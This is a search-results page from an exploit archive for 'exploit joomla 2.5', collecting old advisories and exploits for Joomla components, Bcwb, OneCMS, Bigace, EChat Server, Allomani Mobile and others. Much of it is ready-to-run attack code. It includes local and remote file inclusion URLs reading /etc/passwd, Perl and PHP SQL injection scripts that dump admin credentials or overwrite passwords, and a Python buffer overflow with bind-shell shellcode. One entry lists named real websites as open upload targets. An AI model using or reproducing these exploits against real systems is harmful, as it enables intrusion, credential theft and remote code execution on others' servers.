exploit joomla 2.5
Search result for 'exploit joomla 2.5'
(0.0522470474243 seconds)
wishnusakti/Joomla Agora 2.5.x Pantheon Local File Inclusion ( na)
================================================================================================
Title : Joomla Component Agora (com_agora) LFI Vulnerability
Vendor : http://jvital.com
Download : http://jvitals.com/downloads/file/101-agora-pantheon
Version : 2.5.x Pantheon
Date : Sunday, July 4 2010 - GMT +07:00 Jakarta, Indonesia
Author : wishnusakti + inc0mp13te
Contact : wishnusakti[at]gmail.com
================================================================================================
[+] Vulnerable
$task = trim( JRequest::getVar('task', "") );
$task = str_replace( '../', '', $task );
if ($task)
{
require (AGORA_ROOT . "$task.php");
}
else
{
require ($agora_path . "/index.php");
}
[+] Exploit
http://[site]/[path]/index.php?option=com_agora&task=[LFI]
[+] PoC
http://localhost/index.php?option=com_agora&task=....//....//....//....//....//....//....//....//..../etc/passwd%0000
================================================================================================
Very Special thanks :
Penghuni priv8 Server
(ander, NoGe, zxvf, kaka11, s4va, meylira, Jack, aJe, Unyil, s4va, cheche angela zhang, madonk, & Bot² Scan :D)
en Semua Komunitas Hacking Tanah Air
Peace Yo :)
to all my friends :
cakill, aurell, hafiz, xco, xshadow,
gblack, krembis, biakkobar, hendri_note
================================================================================================
# ./wishnusakti + inc0mp13te
The Joomla Agora component version 2.5.x Pantheon suffers from a local file inclusion vulnerability.
Jakub Galczyk/Joomla 2.5.3 Information Disclosure ( na)
[ TITLE ....... ][ Joomla 2.5.3 information disclosure (tested for admin) [ DATE ........ ][ 01.04.2012 [ AUTOHR ...... ][ http://hauntit.blogspot.com [ SOFT LINK ... ][ http://joomla.org [ VERSION ..... ][ 2.5.3 [ TESTED ON ... ][ LAMP [ ----------------------------------------------------------------------- [ [ 1. What is this? [ 2. What is the type of vulnerability? [ 3. Where is bug :) [ 4. More... [--------------------------------------------[ [ 1. What is this? This is very nice CMS, You should try it! ;) [--------------------------------------------[ [ 2. What is the type of vulnerability? This is information disclosure bug for admin logged-in. [--------------------------------------------[ [ 3. Where is bug :) http://your.joomla/administrator/index.php?option=com_modules&view=positions&layout=modal&tmpl=component&function=jSelectPosition_jform_position&client_id=8%27];][][]%3E???%3E./8 Vulnerable parameter is client_id but "output" with information (disclosure bug) is available only in HTML source (so right-click, and view source for 'invalid' string to get information where Joomla is installed on remote server). By the way: You can set this parameter to non-existent ID (for example 11111111111). You should get the same response (in source, search for 'invalid'). [--------------------------------------------[ [ 4. More... - http://hauntit.blogspot.com - http://www.joomla.org - http://www.google.com - http://portswigger.net [ [--------------------------------------------[ [ All questions about new projects @ mail now :) ] [ Best regards [
Joomla version 2.5.3 suffers from an information disclosure vulnerability.
Tri Huynh/openjournal2.5.txt ( na)
Open Journal Blog Authenticaion Bypassing Vulnerability ================================================= PROGRAM: Open Journal HOMEPAGE: http://www.grohol.com/downloads/oj/ VULNERABLE VERSIONS: 2.5 and below DESCRIPTION ================================================= OpenJournal is a completely Web-based interface (say bye-bye to FTP, manual archiving, etc.). Features include: automated file creation; automated index updating; editing of all files through a Web-based interface; entries with or without titles and time posted; automated archiving based on a weekly or monthly format. All done through ordinary text files and no additional perl modules needed to run it DETAILS ================================================= By feeding special crafted data into the uid parameter of the URL, an attacker can by pass the authentication process and access directly to the software's control panel. The below example will let the hacker add a new user to the software account database. http://www.test.com/cgi-bin/oj.cgi?db=default&uid=%00&userid=hacker&auth=adduser WORKAROUND ================================================= Open Journal's author (Dr John Grohol) is contacted.A patched version (2.6) is ready for downloading on the website. CREDITS ================================================= Discovered by Tri Huynh from SentryUnion DISLAIMER ================================================= The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk. FEEDBACK ================================================= Please send suggestions, updates, and comments to: trihuynh@zeeup.com
Open Journal Blog versions 2.5 and below lack proper user authentication prior to attempting to add a new user to the system.
firewall1954/Bcwb2.5.txt ( na)
####################### Firewall #########################
Bcwb 2.5 - Multiple File Include by Firewall
Latin American Defacers
BuG FounD by Firewall
# Application Affect:
Bcwb 2.5
# Sorce Code:
http://prdownloads.sourceforge.net/bcwb/bcwb_v25.zip?download
# Code:
if(! include($root_path_admin.'lang/'.$default_language.'.inc.php') ) die("Can't include ".$root_path.'lang/'.$default_language.'.inc.php');
# ExPloit :
http://www.site.com/Bcwb_PATH/include/startup.inc.php?root_path_admin=[Evil Script]
http://www.site.com/Bcwb_PATH/dcontent/default.css.php?root_path_admin=[Evil Script]
http://www.site.com/Bcwb_PATH/system/default.css.php?root_path_admin=[Evil Script]
# GrEatZ :LAD,C-group,Her0,slackwaren,slappter,Cvir.System,Hanowars,ANtrAX
,napster,saok,Zlevyn,FaLENcE,Azrael,CyberAlexis,krhonoz,RaDaM4nTySS.
####################### Firewall #########################
Bcwb 2.5 suffers from multiple remote file inclusion vulnerabilities.
Crim3R/Joomla 1.7 / 2.5 Civicrm Arbitrary File Upload ( na)
# Exploit Title: joomla 1.7 & 2.5 (com_civicrm) Arbitrary File Upload Vulnerability # Google Dork: inurl:/components/com_civicrm/ # Date: 08/22/2012 # Author: Crim3R # download Link : http://sourceforge.net/projects/civicrm/files/civicrm-stable/ # Tested on: all ================================== D3m0: http://artistic-webdesign.com/lynda/administrator/components/com_civicrm/civicrm/packages/fckeditor/editor/filemanager/connectors/uploadtest.html http://pflagillinois.org/administrator/components/com_civicrm/civicrm/packages/fckeditor/editor/filemanager/connectors/test.html http://madacenter.com/mada/administrator/components/com_civicrm/civicrm/packages/fckeditor/editor/filemanager/connectors/test.html ===============Crim3R@Att.Net========= $Home = %00 thanks to : 2MzRp - Mikili - 0x0ptim0us - iC0d3R - farbodmahini & Amir
Joomla versions 1.7 and 2.5 suffers from an arbitrary file upload vulnerability in the Civicrm component.
Ctacok/ONECMS 2.5 SQL Injection ( na)
# Exploit Title: ONECMS v2.5 SQL INJECTION
# Date: 05.03.2010
# Author: Ctacok and .:[melkiy]:.
# Software Link: http://sourceforge.net/projects/onecms/
# Version: 2.5
# Tested on: Ubuntu 9.10 Apache2+PHP5
#!/usr/bin/perl
use LWP::Simple;
print "\n";
print "##############################################################\n";
print "# ONECMS v2.5 SQL INJECTION #\n";
print "# Bug founded by: .:[melkiy]:. #\n";
print "# Exploit coded by: Ctacok #\n";
print "# Special for Antichat (forum.antichat.ru) #\n";
print "# Require : Magic_quotes = Off #\n";
print "##############################################################\n";
if (@ARGV < 2)
{
print "\n Usage: exploit.pl [host] [path] ";
print "\n EX : exploit.pl www.localhost.com /path/ prefix \n\n";
exit;
}
$host=$ARGV[0];
$path=$ARGV[1];
$prefix=$ARGV[2]; # PREFIX TABLES, Default: onecms
$vuln = "-2'+union+select+1,2,3,4,5,6,7,8,concat(0x3a3a3a,id,0x3a,username,0x3a,password,0x3a3a3a),10,11+from+".$prefix."_users";
$doc = get($host.$path."index.php?load=elite&user=".$vuln."+--+");
if ($doc =~ /:::(.+):(.+):(.+):::/){
print "\n[+] Admin id: : $1";
print "\n[+] Admin email: $2";
print "\n[+] Admin password: $3";
}
_________________________________________________________________
Устали от СПАМа на рабочем месте? Возьмите решение от NextMail:
http://www.nextcorp.ru/corp/virt.phtml
ONECMS version 2.5 remote SQL injection exploit.
YEnH4ckEr/Bigace CMS 2.5 SQL Injection ( na)
#!/usr/bin/perl
#-----------------------------------------------------------------------------
# User options changer (SQLi) EXPLOIT --Bigace CMS -stable release- 2.5-->
#-----------------------------------------------------------------------------
#
#CMS INFORMATION:
#
#-->WEB: http://www.bigace.de/
#-->DOWNLOAD: http://downloads.sourceforge.net/bigace/
#-->DEMO: http://www.bigace.de/demo.html
#-->CATEGORY: CMS / Blogging
#-->DESCRIPTION: BIGACE is an easy-to-use multisite, multilanguage and multiuser
# Web CMS, written for PHP/MySQL.Uses FCKeditor for HTML editing...
#-->RELEASED: 2009-04-27
#
#CMS VULNERABILITY:
#
#-->TESTED ON: firefox 3
#-->DORK: "Powered by BIGACE 2.5"
#-->CATEGORY: USER OPTIONS CHANGER/ SQL INJECTION/ PERL EXPLOIT
#-->AFFECT VERSION: LAST = 2.5 (Maybe <= ?)
#-->Discovered Bug date: 2009-04-27
#-->Reported Bug date: 2009-04-27
#-->Fixed bug date: 2009-05-04
#-->Info patch (2.6): http://www.bigace.de/BIGACE-2.6.html
#-->Author: YEnH4ckEr
#-->mail: y3nh4ck3r[at]gmail[dot]com
#-->WEB/BLOG: N/A
#-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.
#-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)
#
#
#------------
#CONDITIONS:
#------------
#
#**gpc_magic_quotes=off
#
#-----------------
#PRE-REQUIREMENTS
#-----------------
#
#Package --> allow.self.registration --> True (Default value)
#
#-------
#NEED:
#-------
#
#**valid username
#
#**real captcha code/img
#
#**maybe PHPSESSID (with securimage captcha plugin)
#
#---------------------------------------
#PROOF OF CONCEPT (SQL INJECTION):
#---------------------------------------
#
#Register module (username option) is vuln to sql injection.
#
#Username --> Proof of concept','password','thisisthelanguage')%23
#
#Other parameters --> something
#
#
#---------------------------------------
#EXPLOIT (SQL INJECTION):
#---------------------------------------
#
#If you find a valid username, it can use --> "ON DUPLICATE KEY UPDATE column=value",
#
#this clause updates the previous row if a unique index is affected (username) and
#
#doesn't insert a new row. So (username=admin --> valid user):
#
#Username --> admin','any','any') ON DUPLICATE KEY UPDATE password=MD5(12345)%23
#
#Other parameters --> something
#
#If username=admin exists then, his password is changed to 12345!
#
#---------------------------------------
#INSTRUCTIONS:
#---------------------------------------
#
#Go to vuln web --> user register
#
#Copy the captcha image name/sid:
#
#For example --> b2evo_captcha_e24cf14f6a03283413dfb7133624a39e --> Use the b2evo captcha!
#
#For example --> ead9c0aa4822c265b346c67390b7235d --> Use the securimage captcha!
#
#Copy the captcha text. For example --> WEGKA
#
#Search a valid user. For example --> admin
#
#Choose a column. Possibilities: id,cid,email,username,password,language or active.
#
#Introduce a value for this column.
#
#If captcha uses securimage also you need PHPSESSID to exploit.
#
#Launch the exploit!
#
#Note: If username isn't valid, ie, he doesn't exist then, a new invalid user is inserted.
#
#
#######################################################################
#######################################################################
##*******************************************************************##
## SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k ... ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
## GREETZ TO: SPANISH H4ck3Rs community! ##
##*******************************************************************##
#######################################################################
#######################################################################
#
use LWP::UserAgent;
use HTTP::Request;
use Digest::MD5 qw(md5_hex);
#Subroutines
sub lw
{
my $SO = $^O;
my $linux = "";
if (index(lc($SO),"win")!=-1){
$linux="0";
}else{
$linux="1";
}
if($linux){
system("clear");
}
else{
system("cls");
system ("title BIGACE CMS 2.5 (User Options changer) Exploit");
system ("color 02");
}
}
sub request {
my $userag = LWP::UserAgent->new;
$userag -> agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
my $request = HTTP::Request -> new(POST => $_[0]);
if($_[2] == 1){
#Securimage needs PHPSESSID
$request->header(cookie => "PHPSESSID=".$_[3]);
}
#I need referer for captcha
$request->referer($_[0]);
$request->content_type('application/x-www-form-urlencoded');
$request->content($_[1]);
my $outcode= $userag->request($request)->as_string;
return $outcode;
}
sub error {
print "\t------------------------------------------------------------\n";
print "\tWeb isn't vulnerable!\n\n";
print "\t--->Maybe:\n\n";
print "\t\t1.-Patched or magic_quotes_gpc=ON.\n";
print "\t\t2.-User doesn't exist.\n";
print "\t\t3.-Error in captcha code or image.\n";
print "\t\t4.-Column doesn't exist.\n";
print "\t\t5.-Bad path or host.\n";
print "\t\t6.-Repeat captcha with option 1 (securimage).\n\n";
print "\t\tEXPLOIT FAILED!\n";
print "\t------------------------------------------------------------\n";
}
sub helper {
print "\n\t[!!!] BIGACE-CMS--stable-release-2.5-->(User Options) Exploit\n";
print "\t[!!!] USAGE MODE: [!!!]\n";
print "\t[!!!] perl $0 [HOST] [PATH] [Type Captcha] [Captcha/ssid img] [Captcha code] [Column] [Value] [User]\n";
print "\t[!!!] [HOST]: Web.\n";
print "\t[!!!] [PATH]: Home Path.\n";
print "\t[!!!] [Type Captcha]: B2Evo --> 0. Securimage --> 1. Default: 0\n";
print "\t[!!!] [Captcha/ssid img]: Img captcha name (0) or Img ssid name (1).\n";
print "\t[!!!] [Captcha code]: Captcha text.\n";
print "\t[!!!] [Column]: email,active(0/1),username,password,id,cid or language\n";
print "\t[!!!] [Value]: Set changed value\n";
print "\t[!!!] [User]: Username to change\n";
print "\t[!!!] [PHPSESSID]: Securimage needs PHPSESSID.\n";
print "\t[!!!] Example-1: perl $0 'www.example.es' 'bigace' '0' 'b2evo_captcha_ed5c10cb69be1ee9340b3743c8718fe2'\n";
print "\t[!!!] 'EWZ3L' 'password' '12345' 'admin'\n";
print "\t[!!!] Example-2: perl $0 'www.example.es' 'bigace' '1' '6f15b93e170f5f5e50922361b06d228d'\n";
print "\t[!!!] 'EWZ3' 'password' '12345' 'admin' 'u3h7on9taiihpbm51roeqqq2q2'\n";
print "\t[!!!] Note: If option 0 is available you can use this captcha code to change more options!\n\n";
}
#Main
&lw;
print "\t#######################################################\n\n";
print "\t#######################################################\n\n";
print "\t## BIGACE CMS 2.5 - (User Options changer) Exploit ##\n\n";
print "\t## ++Conditions: magic_quotes=off ##\n\n";
print "\t## ++Needed: Username to change ##\n\n";
print "\t## ++Needed: Valid captcha img/code ##\n\n";
print "\t## Author: Y3nh4ck3r ##\n\n";
print "\t## Contact:y3nh4ck3r[at]gmail[dot]com ##\n\n";
print "\t## Proud to be Spanish! ##\n\n";
print "\t#######################################################\n\n";
print "\t#######################################################\n\n";
#Init variables
my $host=$ARGV[0];
my $path=$ARGV[1];
my $img=$ARGV[3];
my $code=$ARGV[4];
my $columns=$ARGV[5];
my $values=$ARGV[6];
my $username=$ARGV[7];
if(($ARGV[2]==0) || ($ARGV[2]==1)){
$option=$ARGV[2];
$numArgs = $#ARGV + 1;
if($numArgs<=7)
{
&helper;
exit(1);
}
}else{
$option=0;
$numArgs = $#ARGV + 1;
if($numArgs<=6)
{
&helper;
exit(1);
}
}
if($columns eq "password"){
$values=md5_hex($values); #pass in md5
}
#Build the uri
my $finalhost="http://".$host."/".$path."/index.php?cmd=application&id=-1_tauth_kregister_len";
#Check all variables needed
#sql injection
$injection=$username."','any','any') ON DUPLICATE KEY UPDATE ".$columns."='".$values."'%23";
#build posts with injection
if($option==0){
$post="register=do&validate=http://".$host."/".$path."/addon/b2evo/b2evo_captcha_tmp/".$img.".jpg&username=";
$PHPSESSID="nothing";
}else{
$post="register=do&validate=http://".$host."/".$path."/addon/securimage/show_captcha.php?sid=".$img."&username=";
$PHPSESSID=$ARGV[8];
}
$post.=$injection."&language=en&email=y3nh4ck3r@gmail.com&password=xxxxxxxxxxx&pwdrecheck=xxxxxxxxxxx&captcha=".$code."&sumbit=Create";
$output=&request($finalhost, $post, $option, $PHPSESSID);
#processed
if($output!~(/Title: 404 Not Found/))
{
if ($output!~(/\<div align=\"center\" id=\"registerError\"\>/))
{
print "\n\t---------------------------------------------------------------\n";
print "\t-- EXPLOIT EXECUTED (BIGACE CMS 2.5 User Options changer) --\n";
print "\t---------------------------------------------------------------\n\n";
print "\t\tUser option changed!\n\n";
print "\t\tOption changed: ".$columns."\n";
print "\t\tNew value: ".$values."\n\n";
print "\t\tIf username isn't real, you add a new inconsistent active user!\n\n";
print "\t\tNote: If option 0 is available you can use this captcha code\n";
print "\t\tto change more options!\n\n";
print "\n\t<<<<<<----------------------FINISH!---------------->>>>>>>>\n\n";
print "\t<<<<<<--------------Thanks to: y3hn4ck3r------------>>>>>>>\n\n";
print "\t<<<<<<-----------------------EOF-------------------->>>>>>>\n\n";
}else{
&error;
}
}else{
&error;
}
exit(1);
#Ok...all job done
Bigace CMS version 2.5 user options changing SQL injection exploit.
Juan Sacco/EChat Server 2.5 Buffer Overflow ( na)
Information
--------------------
Name : EChat Server <= v2.5
Software : E Chat Server
Vendor Homepage : http://www.echatserver.com/
Vulnerability Type : Remote Buffer Overflow Exploit
Severity : High
Researcher : Juan Sacco (Runlvl) <jsacco [at] insecurityresearch [dot] com>
Description
------------------
EChat Server is prone to a remote buffer-overflow vulnerability
because it fails to perform adequate boundary-checks on user-supplied
data.
Successfully exploiting this issue will allow an attacker to execute
arbitrary code within the context of the affected application. Failed
exploit attempts will result in a denial-of-service condition.
Exploit example as follow
-----------------------------
#!/usr/bin/python
# Easy Chat Server Server <= v2.5 Remote Buffer Overflow Exploit
# Written by Juan Sacco (Runlvl)
# Contact: jsacco@insecurityresearch.com
# Web site: http://www.insecurityresearch.com
# Target tested: Windows XP SP3
import string, sys
import socket, httplib
import telnetlib
def howtousage():
print "Sorry, required arguments: Host Port"
sys.exit(-1)
def run():
try:
# Basic structure: JUNK + NSEH + SEH + SHELLCODE
Junk = '\x41' * 216 # 216 bytes of A
nSEH = '\xEB\x06\x90\x90' # JMP 6 bytes short
SEH = '\xE1\xB2\x01\x10' # 0x1001b2e1 pop edi; pop esi; ret
# ShellCode Bind TCP PORT 444 Lenght 751 Encode : Alpha Upper
ShellCode = (
"\x89\xe1\xd9\xed\xd9\x71\xf4\x5f\x57\x59\x49\x49\x49\x49\x43"
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
"\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x5a\x48\x4b\x39\x43\x30"
"\x45\x50\x45\x50\x43\x50\x4c\x49\x4b\x55\x50\x31\x4e\x32\x45"
"\x34\x4c\x4b\x50\x52\x50\x30\x4c\x4b\x56\x32\x54\x4c\x4c\x4b"
"\x50\x52\x52\x34\x4c\x4b\x54\x32\x47\x58\x54\x4f\x4e\x57\x51"
"\x5a\x56\x46\x50\x31\x4b\x4f\x50\x31\x4f\x30\x4e\x4c\x47\x4c"
"\x45\x31\x43\x4c\x43\x32\x56\x4c\x47\x50\x4f\x31\x58\x4f\x54"
"\x4d\x45\x51\x58\x47\x5a\x42\x4c\x30\x51\x42\x56\x37\x4c\x4b"
"\x56\x32\x52\x30\x4c\x4b\x50\x42\x47\x4c\x45\x51\x58\x50\x4c"
"\x4b\x47\x30\x54\x38\x4d\x55\x49\x50\x52\x54\x51\x5a\x45\x51"
"\x4e\x30\x56\x30\x4c\x4b\x50\x48\x54\x58\x4c\x4b\x56\x38\x51"
"\x30\x45\x51\x58\x53\x5a\x43\x47\x4c\x51\x59\x4c\x4b\x56\x54"
"\x4c\x4b\x45\x51\x49\x46\x50\x31\x4b\x4f\x50\x31\x49\x50\x4e"
"\x4c\x49\x51\x58\x4f\x54\x4d\x45\x51\x58\x47\x56\x58\x4d\x30"
"\x54\x35\x5a\x54\x54\x43\x43\x4d\x4b\x48\x47\x4b\x43\x4d\x47"
"\x54\x52\x55\x4d\x32\x50\x58\x4c\x4b\x51\x48\x51\x34\x43\x31"
"\x4e\x33\x43\x56\x4c\x4b\x54\x4c\x50\x4b\x4c\x4b\x56\x38\x45"
"\x4c\x45\x51\x58\x53\x4c\x4b\x43\x34\x4c\x4b\x45\x51\x4e\x30"
"\x4c\x49\x50\x44\x56\x44\x56\x44\x51\x4b\x51\x4b\x45\x31\x51"
"\x49\x50\x5a\x50\x51\x4b\x4f\x4d\x30\x56\x38\x51\x4f\x50\x5a"
"\x4c\x4b\x54\x52\x5a\x4b\x4b\x36\x51\x4d\x52\x48\x56\x53\x47"
"\x42\x43\x30\x45\x50\x43\x58\x43\x47\x43\x43\x47\x42\x51\x4f"
"\x56\x34\x52\x48\x50\x4c\x52\x57\x56\x46\x45\x57\x4b\x4f\x4e"
"\x35\x4e\x58\x5a\x30\x45\x51\x43\x30\x45\x50\x51\x39\x4f\x34"
"\x51\x44\x56\x30\x52\x48\x51\x39\x4d\x50\x52\x4b\x45\x50\x4b"
"\x4f\x4e\x35\x56\x30\x56\x30\x50\x50\x50\x50\x47\x30\x50\x50"
"\x47\x30\x50\x50\x52\x48\x5a\x4a\x54\x4f\x49\x4f\x4d\x30\x4b"
"\x4f\x49\x45\x4d\x59\x58\x47\x50\x31\x49\x4b\x56\x33\x52\x48"
"\x43\x32\x43\x30\x54\x51\x51\x4c\x4b\x39\x4d\x36\x43\x5a\x54"
"\x50\x56\x36\x50\x57\x52\x48\x49\x52\x49\x4b\x56\x57\x43\x57"
"\x4b\x4f\x58\x55\x50\x53\x56\x37\x52\x48\x4f\x47\x4b\x59\x50"
"\x38\x4b\x4f\x4b\x4f\x49\x45\x51\x43\x51\x43\x51\x47\x43\x58"
"\x43\x44\x5a\x4c\x47\x4b\x4b\x51\x4b\x4f\x49\x45\x51\x47\x4c"
"\x49\x4f\x37\x52\x48\x52\x55\x52\x4e\x50\x4d\x45\x31\x4b\x4f"
"\x4e\x35\x45\x38\x45\x33\x52\x4d\x45\x34\x45\x50\x4c\x49\x5a"
"\x43\x51\x47\x51\x47\x51\x47\x50\x31\x5a\x56\x52\x4a\x45\x42"
"\x51\x49\x56\x36\x4d\x32\x4b\x4d\x45\x36\x4f\x37\x51\x54\x51"
"\x34\x47\x4c\x43\x31\x43\x31\x4c\x4d\x47\x34\x56\x44\x54\x50"
"\x49\x56\x45\x50\x51\x54\x51\x44\x50\x50\x50\x56\x56\x36\x56"
"\x36\x47\x36\x51\x46\x50\x4e\x51\x46\x50\x56\x56\x33\x51\x46"
"\x43\x58\x52\x59\x58\x4c\x47\x4f\x4c\x46\x4b\x4f\x58\x55\x4c"
"\x49\x4b\x50\x50\x4e\x51\x46\x47\x36\x4b\x4f\x56\x50\x45\x38"
"\x54\x48\x4d\x57\x45\x4d\x43\x50\x4b\x4f\x49\x45\x4f\x4b\x4b"
"\x4e\x54\x4e\x50\x32\x4b\x5a\x52\x48\x4e\x46\x4c\x55\x4f\x4d"
"\x4d\x4d\x4b\x4f\x4e\x35\x47\x4c\x54\x46\x43\x4c\x45\x5a\x4b"
"\x30\x4b\x4b\x4b\x50\x54\x35\x43\x35\x4f\x4b\x47\x37\x45\x43"
"\x52\x52\x52\x4f\x43\x5a\x45\x50\x51\x43\x4b\x4f\x4e\x35\x41"
"\x41")
ShellCodePort = 4444
CraftedBuffer = Junk + nSEH + SEH + ShellCode
vulnerableURL = '/chat.ghp?username=' + CraftedBuffer +
'&password=null&room=1&null=2'
Connection = httplib.HTTPConnection(Host, Port)
Connection.request('GET', vulnerableURL)
Connection.close()
print "Connecting to " + Host
TelnetConnection = telnetlib.Telnet(Host, ShellCodePort)
TelnetConnection.interact()
except:
print "Exploit connection closed"
if __name__ == '__main__':
print "Exploit EChat Server <= v2.5 Remote Buffer Overflow Exploit"
print "Author: Juan Sacco (Runlvl)"
try:
Host = sys.argv[1]
Port = sys.argv[2]
except IndexError:
howtousage()
run()
Author
-------------------
Juan Sacco (Runlvl) - http://www.insecurityresearch.com
--
_________________________________________________
Insecurity Research - Security auditing and testing software
Web: http://www.insecurityresearch.com
Insect Pro 2.6.1 was released stay tunned
EChat Server versions 2.5 and below remote buffer overflow exploit.
Qabandi/Allomani Mobile 2.5 SQL Injection ( na)
<?php
ini_set("max_execution_time",0);
print_r('
|| || | ||
o_,_7 _|| . _o_7 _|| q_|_|| o_///_,
( : / (_) / ( .
___________________
_/QQQQQQQQQQQQQQQQQQQ\__
[q] Allomani Mobile v2.5 __/QQQ/````````````````\QQQ\___
Blind SQL inj. exploit _/QQQQQ/ \QQQQQQ\
[q] _GET <3 /QQQQ/`` ```QQQQ\
/QQQQ/ \QQQQ\
[q] http://allomani.com |QQQQ/ By Qabandi \QQQQ|
|QQQQ| |QQQQ|
|QQQQ| From Kuwait, PEACE... |QQQQ|
|QQQQ| |QQQQ|
|QQQQ\ iqa[a]hotmail.fr /QQQQ|
[/] -[hai]- \QQQQ\ __ /QQQQ/
\QQQQ\ /QQ\_QQQQ/
\QQQQ\ \QQQQQQQ/
\QQQQQ\ /QQQQQ/_
``\QQQQQ\_____________/QQQ/\QQQQ\_
``\QQQQQQQQQQQQQQQQQQQ/ `\QQQQ\
``````````````````` `````
______________________________________________________________________________
/ \
| I%00Dont%00Care... |
\______________________________________________________________________________/
\ No More Private /
`````````````````
');
if ($argc<3) {
print_r('
-----------------------------------------------------------------------------
Usage: php '.$argv[0].' VICTIM DIR
example: php '.$argv[0].' EXAMPLE /demo/
or if in root dir:
example: php '.$argv[0].' EXAMPLE //
-----------------------------------------------------------------------------
');
die;
}
function QABANDI($victim,$vic_dir,$inj){
$host = $victim;
$p = "http://".$host.$vic_dir;
$inj = urlencode($inj);
$packet ="GET ".$p."/login.php?action=login&username=".$inj."&password=ass HTTP/1.1\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
$packet.="Pragma: no-cache\r\n";
$packet.="Host: ".$victim."\r\n";
$packet.="Connection: Close\r\n\r\n";
//echo $packet;
$o = @fsockopen($host, 80);
if(!$o){
echo "\n[x] No response...\n";
die;
}
fputs($o, $packet);
while (!feof($o)) $data .= fread($o, 1024);
fclose($o);
$_404 = strstr( $data, "HTTP/1.1 404 Not Found" );
if ( !empty($_404) ){
echo "\n[x] 404 Not Found... Make sure of path. \n";
die;
}
return $data;
}
function QAB_GET($from){
$content = $from;
preg_match_all("/<center>([^<]+)<\/center>/",
$content,
$out, PREG_PATTERN_ORDER);
return base64_encode($out[1][0]);
}
$host1 = $argv[1];
$userdir1=$argv[2];
$truths = QAB_GET(QABANDI($host1,$userdir1,"' or 1='1"));
$falses = QAB_GET(QABANDI($host1,$userdir1,"' or 1='2"));
if($truths == $falses){
echo "Magic Quotes is on, exploit failed\n";
die;
}
echo "\n[q]Getting Admin User and Pass";
echo "\n username: ";
for ($i = 1; $i <= 122; $i++) {
$qest = QAB_GET(QABANDI($host1,$userdir1,"' or ascii(substring((select username from mobile_user limit 0,1),1,1))='".$i));
if ($qest == $truths) {
echo chr($i);
}
}
for ($i = 1; $i <= 122; $i++) {
$qest = QAB_GET(QABANDI($host1,$userdir1,"' or ascii(substring((select username from mobile_user limit 0,1),2,1))='".$i));
if ($qest == $truths) {
echo chr($i);
}
}
for ($i = 1; $i <= 122; $i++) {
$qest = QAB_GET(QABANDI($host1,$userdir1,"' or ascii(substring((select username from mobile_user limit 0,1),3,1))='".$i));
if ($qest == $truths) {
echo chr($i);
}
}
for ($i = 1; $i <= 122; $i++) {
$qest = QAB_GET(QABANDI($host1,$userdir1,"' or ascii(substring((select username from mobile_user limit 0,1),4,1))='".$i));
if ($qest == $truths) {
echo chr($i);
}
}
for ($i = 1; $i <= 122; $i++) {
$qest = QAB_GET(QABANDI($host1,$userdir1,"' or ascii(substring((select username from mobile_user limit 0,1),5,1))='".$i));
if ($qest == $truths) {
echo chr($i);
}
}
for ($i = 1; $i <= 122; $i++) {
$qest = QAB_GET(QABANDI($host1,$userdir1,"' or ascii(substring((select username from mobile_user limit 0,1),6,1))='".$i));
if ($qest == $truths) {
echo chr($i);
}
}
for ($i = 1; $i <= 122; $i++) {
$qest = QAB_GET(QABANDI($host1,$userdir1,"' or ascii(substring((select username from mobile_user limit 0,1),7,1))='".$i));
if ($qest == $truths) {
echo chr($i);
}
}
for ($i = 1; $i <= 122; $i++) {
$qest = QAB_GET(QABANDI($host1,$userdir1,"' or ascii(substring((select username from mobile_user limit 0,1),8,1))='".$i));
if ($qest == $truths) {
echo chr($i);
}
}
echo "\n password: ";
for ($i = 1; $i <= 122; $i++) {
$qest = QAB_GET(QABANDI($host1,$userdir1,"' or ascii(substring((select password from mobile_user limit 0,1),1,1))='".$i));
if ($qest == $truths) {
echo chr($i);
}
}
for ($i = 1; $i <= 122; $i++) {
$qest = QAB_GET(QABANDI($host1,$userdir1,"' or ascii(substring((select password from mobile_user limit 0,1),2,1))='".$i));
if ($qest == $truths) {
echo chr($i);
}
}
for ($i = 1; $i <= 122; $i++) {
$qest = QAB_GET(QABANDI($host1,$userdir1,"' or ascii(substring((select password from mobile_user limit 0,1),3,1))='".$i));
if ($qest == $truths) {
echo chr($i);
}
}
for ($i = 1; $i <= 122; $i++) {
$qest = QAB_GET(QABANDI($host1,$userdir1,"' or ascii(substring((select password from mobile_user limit 0,1),4,1))='".$i));
if ($qest == $truths) {
echo chr($i);
}
}
for ($i = 1; $i <= 122; $i++) {
$qest = QAB_GET(QABANDI($host1,$userdir1,"' or ascii(substring((select password from mobile_user limit 0,1),5,1))='".$i));
if ($qest == $truths) {
echo chr($i);
}
}
for ($i = 1; $i <= 122; $i++) {
$qest = QAB_GET(QABANDI($host1,$userdir1,"' or ascii(substring((select password from mobile_user limit 0,1),6,1))='".$i));
if ($qest == $truths) {
echo chr($i);
}
}
for ($i = 1; $i <= 122; $i++) {
$qest = QAB_GET(QABANDI($host1,$userdir1,"' or ascii(substring((select password from mobile_user limit 0,1),7,1))='".$i));
if ($qest == $truths) {
echo chr($i);
}
}
for ($i = 1; $i <= 122; $i++) {
$qest = QAB_GET(QABANDI($host1,$userdir1,"' or ascii(substring((select password from mobile_user limit 0,1),8,1))='".$i));
if ($qest == $truths) {
echo chr($i);
}
}
for ($i = 1; $i <= 122; $i++) {
$qest = QAB_GET(QABANDI($host1,$userdir1,"' or ascii(substring((select password from mobile_user limit 0,1),9,1))='".$i));
if ($qest == $truths) {
echo chr($i);
}
}
for ($i = 1; $i <= 122; $i++) {
$qest = QAB_GET(QABANDI($host1,$userdir1,"' or ascii(substring((select password from mobile_user limit 0,1),10,1))='".$i));
if ($qest == $truths) {
echo chr($i);
}
}
